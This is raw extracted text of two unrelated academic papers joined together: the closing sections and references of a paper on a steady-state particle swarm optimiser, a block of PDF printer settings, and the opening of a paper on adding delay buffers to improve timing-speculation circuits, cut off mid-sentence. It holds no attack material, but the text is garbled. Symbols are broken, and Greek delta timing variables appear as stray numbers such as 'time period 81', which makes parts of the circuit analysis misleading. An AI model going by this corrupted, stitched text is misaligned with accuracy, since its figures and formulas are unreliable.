func�on evalua�ons (A) Sphere (f1) S-PSO SS-PSO DSWPSO 0 0.2 0.4 0.6 0.8 1 fit ne ss func�on evalua�ons (B) Weierstrass (f7) S-PSO SS-PSO DSWPSO Figure 10 S-PSO, SS-PSO and DSWPSO best fitness curves for the sphere (A) and Weierstrass (B) benchmark functions. Full-size DOI: 10.7717/peerj-cs.202/fig-10 Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 26/30 http://dx.doi.org/10.7717/peerj-cs.202/fig-10 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ algorithms and parameters are set as in previous experiments. Figure 11 shows the running times of 49,000 functions evaluations (median values over 10 runs for each algorithm). The running times of each algorithm are statistically equivalent for every D value. Running times of SS-PSO with von Neumann and Moore neighborhood are also equivalent. The PerfAndPubTools software (Fachada et al., 2016) was used to analyze the running times. DISCUSSION The experiments in the previous sections demonstrate that SS-PSO is able to significantly improve the performance of the standard PSO, at least on the set of benchmark functions. The differences are particularly noticeable in the convergence speed of the algorithms, but SS-PSO is also able to improve the solution quality in several functions (see Table 8). An experiment comparing three different steady-state strategies show that replacing the worst particle and its neighbors is the best strategy. Our initial hypothesis (reducing the number of evaluations in each time step, while focusing only on the worst solutions, reduces the computational effort to reach a solution) is confirmed. The relative performance of SS-PSO and standard PSO has also been verified for a wide range of parameter values (see Figs. 4–7) as well as for different problem dimensions (see Fig. 3). These results are important since they demonstrate that the proposed strategy has not been fine-tuned and that its validity is not restricted to a particular region of the parameter space or problem dimension. The algorithm was also compared to a PSO with time-varying acceleration, again attaining good results, thus reinforcing the idea that the steady-state strategy is consistent and robust. SS-PSO was compared to CLPSO, and while being outperformed in terms of solution quality in four functions, it yields better solutions in two problems, and is faster in other two functions. Since CLPSO is considered to be a very efficient algorithm, these results are promising. It deserves further examination whether variants of SS-PSO could clearly outperform CLPSO. Finally, SS-PSO was compared to DSWPSO with excellent results. 0 2 4 6 8 10 12 14 d = 10 d = 30 d = 50 d = 100 t( s) S-PSO SS-PSO Figure 11 S-PSO and SS-PSO running times. Full-size DOI: 10.7717/peerj-cs.202/fig-11 Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 27/30 http://dx.doi.org/10.7717/peerj-cs.202/fig-11 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ CONCLUSIONS This paper investigates the performance of a new and unconventional updated strategy for the PSO. The SS-PSO is inspired by the Bak–Sneppen model of coevolution. However, while in the Bak–Sneppen model the worst individual and its neighbors are replaced by random values, in SS-PSO the worst particle and its neighbors are updated and evaluated in each time step. The remaining particles are kept in a steady state until they eventually satisfy the update criterion. Due to its strategy, SS-PSO may be classified within the A-PSOs category. However, its working mechanisms are radically different from standard A-PSOs. After preliminary tests that determined the best topology for a set of ten unimodal, multimodal, shifted, noisy and rotated benchmark problems, the strategy was implemented on the winning structure: two-dimensional lattice with Moore neighborhood. Quality of solutions, convergence speed and success rates were compared and statistical analyses were conducted on the results. SS-PSO significantly improved the performance of a standard S-PSO in every function, at least in one of the two criteria (quality of final solutions and convergence speed). A parameter sensitivity analysis showed that SS-PSO is not more sensitive to the variation of parameter values than S-PSO. A scalability test showed that the proposed strategy does not introduce scalability difficulties. The algorithm was compared to PSO-TVA, CLPSO and DSWPSO with good results. The first step in future works is to increase the size of the test with more functions, hoping that an extended test set can improve our insight into the behavior of the algorithm. The emergent properties of the algorithm (size of events, duration of stasis, critical values) will be also studied and compared to those of the Bak–Sneppen model. Finally, steady-state update strategies in dynamic topologies will be investigated. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by Fundação para a Ciência e Tecnologia (FCT) Research Fellowship SFRH/BPD/66876/2009 and FCT Project (UID/EEA/50009/2013), EPHEMECH (TIN2014-56494-C4-3-P, Spanish Ministry of Economy and Competitivity), PROY-PP2015-06 (Plan Propio 2015 UGR), project CEI2015-MP-V17 of the Microprojects program 2015 from CEI BioTIC Granada. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Fundação para a Ciência e Tecnologia (FCT), Research Fellowship: SFRH/BPD/66876/2009. FCT PROJECT: UID/EEA/50009/2013. EPHEMECH: TIN2014-56494-C4-3-P, Spanish Ministry of Economy and Competitivity. PROY-PP2015-06: Plan Propio 2015 UGR. CEI2015-MP-V17 of the Microprojects program 2015 from CEI BioTIC Granada. Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 28/30 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ Competing Interests The authors declare that they have no competing interests. Author Contributions � Carlos M. Fernandes conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Nuno Fachada conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Juan-Julián Merelo authored or reviewed drafts of the paper, approved the final draft. � Agostinho C. Rosa authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: Data is available at GitHub: https://github.com/laseeb/openpso. REFERENCES Allmendiger R, Li X, Branke J. 2008. Reference point-based particle swarm optimization using a steady-state approach, SEAL 2008. Lecture Notes in Computer Science 5361:200–209 DOI 10.1007/978-3-540-89694-4_21. Aziz NAB, Mubin M, Mohamad MS, Aziz KA. 2014. A synchronous-asynchronous particle swarm optimisation algorithm. Scientific World Journal 2014:123019 DOI 10.1155/2014/123019. Baillieul J, Samad T. 2015. Encyclopedia of systems and control. London: Springer-Verlag. Bak P. 1996. How nature works. New York: Springer-Verlag, 1996. Bak P, Sneppen K. 1993. Punctuated equilibrium and criticality in a simple model of evolution. Physical Review Letters 71(24):4083–4086 DOI 10.1103/physrevlett.71.4083. Bak P, Tang C, Wiesenfeld K. 1987. Self-organized criticality: an explanation of 1/f noise. Physical Review Letters 59(4):381–384 DOI 10.1103/PhysRevLett.59.381. Boettcher S, Percus AG. 2003. Optimization with extremal dynamics. Complexity 8(2):57–62. Carlisle A, Dozier G. 2001. An off-the-shelf PSO. In: Proceeding of Workshop on Particle Swarm Optimization, Indianapolis, Purdue School of Engineering and Technology, IUPUI, Indianapolis, IN, USA. Vol. 1, 1–6. Engelbrecht AP. 2013. Particle swarm optimization: iteration strategies revisited. In: 2013 BRICS Congress on Computational Intelligence and 11th Brazilian Congress on Computational Intelligence, Recife, Brazil. 119–123. Fachada N, Lopes VV, Martins RC, Rosa AC. 2016. PerfAndPubTools—tools for software performance analysis and publishing of results. Journal of Open Research Software 4(1):e18 DOI 10.5334/jors.115. Fernandes CM, Fachada N, Laredo J, Merelo J, Castillo P, Rosa AC. 2018. Revisiting population structure and particle swarm performance. In: Proceedings of the 10th International Joint Conference on Computational Intelligence—Volume 1, Seville. 248–254. Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 29/30 https://github.com/laseeb/openpso http://dx.doi.org/10.1007/978-3-540-89694-4_21 http://dx.doi.org/10.1155/2014/123019 http://dx.doi.org/10.1103/physrevlett.71.4083 http://dx.doi.org/10.1103/PhysRevLett.59.381 http://dx.doi.org/10.5334/jors.115 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ Fernandes CM, Laredo JLJ, Merelo JJ, Cotta C, Rosa AC. 2014. Particle swarms with dynamic topologies and conservation of function evaluations. In: Proceedings of the International Joint Conference on Computational Intelligence, Rome, Italy. 86–94 DOI 10.5220/0005087900860094. Fernandes CM, Merelo JJ, Rosa AC. 2016. An asynchronous and steady state update strategy for the particle swarm optimization algorithm. In: Proceedings of Parallel Problem Solving from Nature—PPSN XIV, Edimburgh, Scotland. Berlin: Springer, 166–177. Gutenberg B, Richter CF. 1956. Magnitude and energy of earthquakes. Annali di Geofisica 9:1–15 DOI 10.4401/ag-5590. Kennedy J, Eberhart R. 1995. Particle swarm optimization. In: Proceedings of IEEE International Conference on Neural Networks, Perth, Autralia. Vol. 4, 1942–1948 DOI 10.1109/ICNN.1995.488968. Kennedy J, Mendes R. 2002. Population structure and particle swarm performance. In: Proceedings of the IEEE World Congress on Evolutionary Computation, Honolulu, Hawaii, USA. 1671–1676. Liang JJ, Qin AK, Suganthan PN, Baskar S. 2006. Comprehensive learning particle swarm optimizer for global optimization of multimodal functions. IEEE Transactions on Evolutionary Computation 10(3):281–294 DOI 10.1109/tevc.2005.857610. Liu C, Du W-B, Wang W-X. 2014. Particle swarm optimization with scale-free interactions. PLOS ONE 9(5):e97822 DOI 10.1371/journal.pone.0097822. Løvbjerg M, Krink T. 2002. Extending particle swarm optimizers with self-organized criticality. In: Proceedings of the 2002 IEEE Congress on Evolutionary Computation, Honolulu, Hawaii, USA. Vol. 2. IEEE Computer Society. 1588–1593. Lynn N, Suganthan PN. 2015. Heterogeneous comprehensive learning particle swarm optimization with enhanced exploration and exploitation. Swarm and Evolutionary Computation 24:11–24 DOI 10.1016/j.swevo.2015.05.002. Majercik S. 2013. GREEN-PSO: conserving function evaluations in particle swarm optimization. In: Proceedings of the IJCCI 2013, Vilamoura, Portugal. 160–167. McNabb A. 2014. Serial PSO results are irrelevant in a multi-core parallel world. In: Proceedings of the 2014 IEEE Congress on Evolutionary Computation, Beijing, China. 3143–3150. Rada-Vilela J, Zhang M, Seah W. 2013. A performance study on synchronous and asynchrounous updates in particle swarm. Soft Computing 17(6):1019–1030 DOI 10.1145/2001576.2001581. Ratnaweera A, Halgamuge S, Watson H. 2004. Self-organizing hierarchical particle swarm optimizer with time-varying acceleration coefficients. IEEE Transactions on Evolutionary Computation 8(3):240–255 DOI 10.1109/tevc.2004.826071. Shi Y, Eberhart RC. 1999. Empirical study of particle swarm optimization. In: Proceedings of IEEE International Congress on Evolutionary Computation, Washington, DC, USA. Vol. 3, 101–106 DOI 10.1109/CEC.1999.785511. Vora M, Mirlanalinee TT. 2017. Dynamic small world particle swarm optimizer for function Optimization. Natural Computing 17(4):901–917 DOI 10.1007/s11047-017-9639-9. Whitley D, Kauth J. 1988. GENITOR: a different Genetic Algorithm. In: Proceedings of the 1988 Rocky Mountain Conference on Artificial Intelligence, Denver, CO, USA. 118–130. Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 30/30 http://dx.doi.org/10.5220/0005087900860094 http://dx.doi.org/10.4401/ag-5590 http://dx.doi.org/10.1109/ICNN.1995.488968 http://dx.doi.org/10.1109/tevc.2005.857610 http://dx.doi.org/10.1371/journal.pone.0097822 http://dx.doi.org/10.1016/j.swevo.2015.05.002 http://dx.doi.org/10.1145/2001576.2001581 http://dx.doi.org/10.1109/tevc.2004.826071 http://dx.doi.org/10.1109/CEC.1999.785511 http://dx.doi.org/10.1007/s11047-017-9639-9 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ Steady state particle swarm Introduction Materials and Methods Results Discussion Conclusions References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT /DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_afsxvcg3kfhxbgf5td2lfziyua ---- Submitted 21 October 2015 Accepted 23 July 2016 Published 22 August 2016 Corresponding author Naga Durga Prasad Avirneni, prasad.avirneni@gmail.com Academic editor Soha Hassoun Additional Information and Declarations can be found on page 24 DOI 10.7717/peerj-cs.79 Copyright 2016 Avirneni et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Managing contamination delay to improve Timing Speculation architectures Naga Durga Prasad Avirneni1,2, Prem Kumar Ramesh1,3 and Arun K. Somani1 1 Department of Electrical and Computer Engineering, Iowa State University, Ames, IA, USA 2 Current affiliation: Qualcomm, San Diego, CA, USA 3 Current affiliation: Intel, Bengaluru, Karnataka, India ABSTRACT Timing Speculation (TS) is a widely known method for realizing better-than-worst- case systems. Aggressive clocking, realizable by TS, enable systems to operate beyond specified safe frequency limits to effectively exploit the data dependent circuit delay. However, the range of aggressive clocking for performance enhancement under TS is restricted by short paths. In this paper, we show that increasing the lengths of short paths of the circuit increases the effectiveness of TS, leading to performance improvement. Also, we propose an algorithm to efficiently add delay buffers to selected short paths while keeping down the area penalty. We present our algorithm results for ISCAS-85 suite and show that it is possible to increase the circuit contamination delay by up to 30% without affecting the propagation delay. We also explore the possibility of increasing short path delays further by relaxing the constraint on propagation delay and analyze the performance impact. Subjects Algorithms and Analysis of Algorithms, Computer Architecture, Embedded Computing, Emerging Technologies Keywords Timing speculation, Timing errors, PVT variation, Overclocking, Delay insertion, Timing constraints, Reliable and aggressive systems, Contamination delay INTRODUCTION Systems have traditionally been designed to function reliably for the worst case timing delays under adverse operating conditions. Such worst case scenarios occur rarely, allowing possible performance improvement by making common cases faster. Alternative to conventional methods, the concept of latching data speculatively is called Timing Speculation (TS) (Austin, 1999; Bezdek, 2006; Ernst et al., 2003; Greskamp et al., 2009; Greskamp & Torrellas, 2007; Avirneni & Somani, 2012; Subramanian et al., 2007). Dual latch based TS is a widely accepted methodology for designing better-than-worst-case digital circuits. Timing speculation based aggressive systems are designed on the philosophy that it is profitable to operate beyond worst-case limits to achieve best performance by not avoiding, but detecting and correcting a modest number of timing errors. Aggressive design methodology exploit the fact that timing critical paths are rarely exercised in a design and typical execution happens much faster. Recent works have also shown that the performance loss due to over provisioning based on worst-case design margins is upward of 20% in terms of operating frequency and upward of 50% in terms of power efficiency (Gupta et al., 2009). Timing speculation combined with timing error tolerance is a powerful technique How to cite this article Avirneni et al. (2016), Managing contamination delay to improve Timing Speculation architectures. PeerJ Com- put. Sci. 2:e79; DOI 10.7717/peerj-cs.79 https://peerj.com mailto:prasad.avirneni@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.79 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.79 to (1) achieve energy efficiency by under-volting, as in Razor (Ernst et al., 2003), or (2) performance enhancement by overclocking, as in SPRIT3E (Bezdek, 2006). Dual latch based TS require additional clock resources for the replicated latches (or flip-flops), which are triggered by a phase shifted clock of the original register. Despite the area and routing overheads, the benefits achieved by dual latched TS remain immense (Ernst et al., 2003; Avirneni & Somani, 2012; Subramanian et al., 2007; Das et al., 2006; Ramesh, Subramanian & Somani, 2010; Avirneni & Somani, 2013; Avirneni, Ramesh & Somani, 2016). However, in Subramanian et al. (2007) it has been pointed out that the performance benefits realized through TS is limited by the short paths of the circuit. It is due to the tight timing constraints that need to met for error recovery. This problem is compounded when circuits have a significantly lower contamination delay. The contamination delay is defined as the smallest time it takes a circuit to change any of its outputs, when there is a change in the input. It has been shown that for a carry-look ahead (CLA) adder significant performance enhancement is achieved when its contamination delay is increased by adding buffers (Subramanian et al., 2007). Increasing the delay of all shorter paths in the circuit above a desired lower bound, while not affecting the critical path is one of the steps performed during synthesis of sequential circuits to fix hold time violations. However, increasing the contamination delay of a logic circuit significantly, sometimes as high as half the propagation delay, without affecting its propagation delay is not a trivial issue (Shenoy, Brayton & Sangiovanni-Vincentelli, 1993). At the first glance, it might appear that adding delay by inserting buffers to the shortest paths will solve the problem. However, delay of a circuit is strongly input value dependent, and the structure of the circuit plays a role in deciding the value of an output in a particular cycle. Current synthesis tools support increasing the delay of short paths through their hold violation fixing option. Our major goal in this paper is to extend the hold time of the replicated register present in dual latch TS framework. Traditional delay optimization approaches consider only part of the problem, viz., to ensure that the delay of each path is less than a fixed upper bound. The closest work we are aware of is presented in Chen & Muroga (1991), which uses timing optimization algorithm, Sylon-Dream Level-Reduction (SDLR), to speed up multi-level networks. The non-critical paths are processed by an area reduction procedure to reduce network area without increasing the maximum depth. SDLR uses the concept of permissible functions in both level and area reduction processes. Contribution The existing techniques only attempt to confine the critical path delay under design specified threshold. For TS architectures, the delay optimization algorithms must also make sure that the short paths satisfy imposed threshold requirements to increase the extent of performance enhancement. This is, in addition to the existing short path timing constrains free of any hold time violations. This aspect of our work makes it different from any of the existing works. As far as we know, this is the first work aimed at increasing the contamination delay of digital circuits up to a given threshold, beyond satisfying hold time violations. In this paper, we make three significant contributions. Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 2/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 First, we present a detailed timing analysis of a dual latch TS framework and quantify the margin for performance enhancement while operating beyond worst case. Second, we study the impact of short paths on performance of Alpha processor core, where we present a sensitivity analysis of the achievable performance gain for different settings of contamination delay. In that process, we establish a case for increasing contamination delay of circuits in aggressive systems to improve the extent of performance enhancement. Third, we present an algorithm to add delay buffers for dual latch TS framework. Specifically, we develop a weighted graph model to represent a multi-level digital circuit. We showcase a new min-arc algorithm that operates on the graph network to increase short path delays by adding buffers to selective interconnections. We consider each interconnection, whether it lies on the critical path, short path, or not. Depending upon how far each section of the circuit is from the maximum and minimum delayed paths, fixed delay buffers are added. The presented algorithm is evaluated using ISCAS’85 benchmark suite. In our simulations, we investigate the increase in short path delays with and without relaxing critical path delays of these circuits. Also, we analyze the area and power overhead due to the addition of delay buffers at extreme corners. Using our new algorithm, we were able to increase the contamination delay to 30% of the circuit critical path length and also without affecting its propagation delay. We were further able to increase the contamination delay by relaxing the propagation delay constraint for a larger gain in performance. The remainder of this paper is organized as follows. ‘Timing Speculation Framework’ provides an overview of dual-latch TS framework. ‘Performance Impact of Short Paths’ investigates the timing constraints of TS framework and ‘Increasing Short Path Delays’ presents the challenges of increasing short path delays. In ‘Performance & Contamination Delay: A Study on Alpha Processor’, we present our case study on Alpha processor. Following this, we present the network model and the algorithm for manipulating short paths of the circuit in ‘Min-arc Algorithm for Increasing Short Path Delays.’ Results of our experiments are presented in ‘Evaluation of Min-arc Method.’ We present a brief literature review in ‘Related Literature’ and summarize our concluding remarks and future directions in ‘Conclusions.’ TIMING SPECULATION FRAMEWORK In a pipelined architecture, a timing error occurs if changes in the input propagate through the combinational logic before the computed results for the previous input are latched. The timing errors also occur due to the mismatch between the circuit propagation delay and the clock cycle time. Therefore, in a pipelined processor, the clock frequency is determined based on the circuit critical path across all stages under the most adverse operating conditions. Traditional design methodologies for the worst-case operating conditions are too conservative, as the critical timing delays rarely occur in tandem during typical circuit operation. Such infrequent occurrence of critical timing delays opens up a new domain of study that allows improvement of processor performance to a greater extent. During Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 3/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 Figure 1 (A) Typical pipeline stage in a reliably overclocked processor (B) Illustration of aggressive MAIN and PS clocks for circuits with different contamination delays. execution, delay incurred by the digital circuit is much less than the worst-case delay. This can be exploited by making common cases faster. Timing speculation is a technique wherein data generated at aggressive speeds are latched and sent forward speculatively assuming error free operation. Error detection is deployed to detect a timing violation. When an error is detected, the forwarded data is voided and the computation is performed again as part of the recovery action. A framework to achieve this is described below. Dual latched system We first present a brief description of a dual latched timing speculation framework from Bezdek (2006). We refer to this framework as Local Fault Detection and Recovery (LFDR). Figure 1A presents the LFDR circuit in between two pipeline stages. To reliably overclock a system dynamically using LFDR framework, we need two clocks: MAINCLK and PSCLK . The two clocks relationship is governed by timing requirements that are to be met at all times. LFDR consists of two registers: a main register clocked ambitiously by MAINCLK , which is running at a frequency higher than that is required for error-free operation; and a backup register clocked by PSCLK , which has same frequency as MAINCLK but is phase shifted. This amount of phase shift is such that backup register always sample the data by meeting the worst-case propagation delay time of the combinational circuit. The timing diagram shown in Fig. 1B illustrate the phase relationship between these clocks. Here, case (i) presents the worst case clock, WCCLK , with time period 81, which covers the maximum propagation delay. Case (ii) shows TS scenario, where the clock time period is reduced to 83. However, PSCLK is delayed by 82 in such a way that the next rising edge of PSCLK coincide with next rising edge of WCCLK . Thus a computation started at the rising edge of MAINCLK will successfully complete by the next rising edge of PSCLK . The key point to note here is that the amount of phase shift, 82, for the PSCLK is limited by the contamination delay, TCD, of the circuit. Figure 2 shows timing waveforms that depict timing speculation using LFDR. In the figure, inst0 moves forward without any timing errors using speculation. However, inst1 encounters a timing error in Stage i, indicated by corrupted data ‘‘terr.’’ This error is detected by the error detection mechanism, and the stage error signal is asserted. This stage error signal triggers a local and global recovery. Timing error recovery flushes the data Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 4/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 Figure 2 Timing diagram showing pipeline stage level timing speculation. sent forward speculatively, indicated in the figure as ‘‘xxx,’’ and voids the computation performed by Stage i+1. Once the timing error is fixed, the pipeline execution continues normally. It is clear from the waveform that the time gained by TS is 84, which is equal to 82. A balance must be maintained between the number of cycles lost to error recovery and the gains of overclocking. One important factor that needs to be addressed while phase shifting the PSCLK is to limit the amount of phase shift within the fastest delay path of the circuit. PERFORMANCE IMPACT OF SHORT PATHS The cardinal factor that limits data-dependent allowable frequency scaling for LFDR frameworks is the contamination delay of the circuit. The phase shift of the delayed clock is restricted by the contamination delay to prevent incorrect result from being latched in the backup register. Reliable execution can be guaranteed only if the contents of the redundant register are considered ‘‘golden.’’ To overcome this limitation, it is important to increase the contamination delay of the circuit. Case (iii) in Fig. 1B presents a TS scenario where the clock time period is reduce 86 and PSCLK is delayed by 85. As phase shift 85 is greater than 82, the range of achievable overclocking is higher in case (iii) than case (ii). From this example, we can conclude that having contamination delay T ′CD > TCD increases the range of aggressive clocking under TS. Let us denote the worst-case propagation delay and minimum contamination delay of the circuit as TPD and TCD, respectively. Let TWCCLK , TMAINCLK and TPSCLK represent the clock periods of WCCLK , MAINCLK and PSCLK , respectively. Let TPS represent the amount of phase-shift between MAINCLK and PSCLK . Also we will denote TOV as the overclocked time period. Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 5/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 At all times, the following equations hold. TWCCLK =TPD= 1 FMIN (1) TMAINCLK =TPSCLK =TOV (2) TPD=TOV +TPS. (3) Let FMIN be the setting when there is no overclocking i.e., TOV = TPD. In this case, TPS = 0. The maximum possible frequency, FMAX permitted by reliable overclocking is governed by TCD. This is because short paths in the circuit, whose delay determine TCD, can corrupt the data latched in the backup register. If the phase shift TPS is greater than TCD, then the data launched can corrupt the backup register at PSCLK edge. If such a corruption happens, then the backup register may latch incorrect result and cannot be considered ‘‘golden.’’ Hence, it is not possible to overclock further than FMAX . The following equations should hold at all times to guarantee reliable overclocking. TPS≤TCD (4) FMAX ≤ 1 TPD−TCD · (5) For any intermediate overclocked frequency, FINT , between FMIN and FMAX , TPS ≤TCD. During operation, FINT is determined dynamically based on the number of timing errors being observed during a specific duration of time. The dependence of phase shift on contamination delay leads directly to the limitation of the aggressive frequency scaling. A simplistic notion of the maximum speed-up that is achievable through reliable overclocking is given by Eq. (6). Maximum Speedup= TPD TPD−TCD · (6) INCREASING SHORT PATH DELAYS It is clear from Eq. (6) that the maximum speedup is achieved when the difference between the contamination delay and propagation delay is minimal. However, it must be noted that increasing TCD also affects the margin for overclocking. To overcome this challenge, we develop a technique for increasing the contamination delay to a moderate extent without affecting the propagation delay of the circuit. As outputs of the combinational logic depends on several inputs, and more than one path to each output exists, with both shorter and longer paths overlapping, adding buffer delays to shorter paths may increase the overall propagation delay of the circuit. The main challenge is to carefully study the delay patterns, and distribute the delay buffers across the interconnections. More importantly, the overall propagation delay must remain unchanged. However, it may not be possible to constrain propagation delay of the critical paths due to logic/interconnection sharing in the network. Most practical circuits have significantly lower contamination delay. For instance, we verified that an 8-bit CLA adder circuit, implemented in 0.18 µm Cadence Generic Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 6/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 Standard Cell Library (GSCLib), has a propagation delay of 1.06 ns, but an insignificant contamination delay of 0.06 ns, thus allowing almost no performance improvement through reliable overclocking. It should be noted that the outputs of CLA adder depends on more than one inputs, thus a trivial addition of delay buffers to short paths results in increased propagation delay of the circuit. However, by re-distributing the delay buffers all to one side (either input or output), it is possible to increase contamination delay, without affecting the propagation delay, by up to 0.37 ns. Increasing circuit path delay above a desired level without affecting critical path is not uncommon in sequential circuit synthesis. In fact, it is performed as a mandatory step during synthesis operation. In a sequential circuit, for an input signal to be latched correctly by an active clock edge, it must become stable before a specified time. This duration before the clock edge is called the set up time of the latch. The input signal must remain stable for a specified time interval after the active clock edge in order to get sampled correctly. This interval is called the hold time of the latch. Any signal change in the input before the next set-up time or after the current hold time does not affect the output until the next active clock edge. Clock skew, which is the difference in arrival times at the source and 